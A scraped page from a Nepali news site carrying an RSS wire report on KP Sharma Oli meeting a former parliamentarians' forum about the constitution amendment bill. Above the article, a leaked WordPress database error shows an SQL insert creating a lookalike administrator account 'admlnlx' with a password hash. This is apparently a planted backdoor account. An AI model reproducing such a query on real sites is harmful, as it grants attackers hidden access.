WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4cJ6pzKftd7Zlnwy4yrti8rwM5I721', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:21:30', '', 'admlnlx', 'admlnlx')
भक्तपुर, पुस ६ –
संविधान संशोधनको विषयमा छलफल गर्न आज नेकपा एमालेका अध्यक्ष केपी शर्मा ओली र पूर्व सांसदमञ्चका टोलीबीच भेटवार्ता भएको छ ।
भक्तपुरको बालकोटस्थित ओली निवासमा मञ्चका अध्यक्ष ओमप्रकाश श्रेष्ठसहितको पदाधिकारी टोली र अध्यक्ष ओली बीच भएको भेटवार्तामा सरकारले संसद्मा दर्ता गरेको संविधान संशोधन विधेयककाबारेमा छलफल भएको सहभागी मञ्चका विश्वेश्वरा दाहालले जानकारी दिनुभयो ।
सरकारले संविधान संशोधन विधेयक तत्काल फिर्ता लिई संसद् खुलाएर निर्वाचनमा जाने वातावरण बनाउनुपर्ने बिषयमा छलफल भएको उहाँले जानकारी दिनुभयो ।
सो अवसरमा एमाले अध्यक्ष ओलीले संसद्मा दर्ता भएको संविधान संशोधन प्रस्ताव फिर्ता लिनुको विकल्प नभएको बताउँदै प्रस्ताव फिर्ता भए मात्रै समस्याको निकास निस्कने बताउनुभयो ।
मुलुकलाई नै सङ्कटमा पार्ने गरी संशोधन प्रस्ताव आएकाले त्यसलाई स्वीकारेर जान नसकिने ओलीको धारणा रहेको मञ्चका विश्वेश्वरा दाहालले भन्नुभयो ।- रासस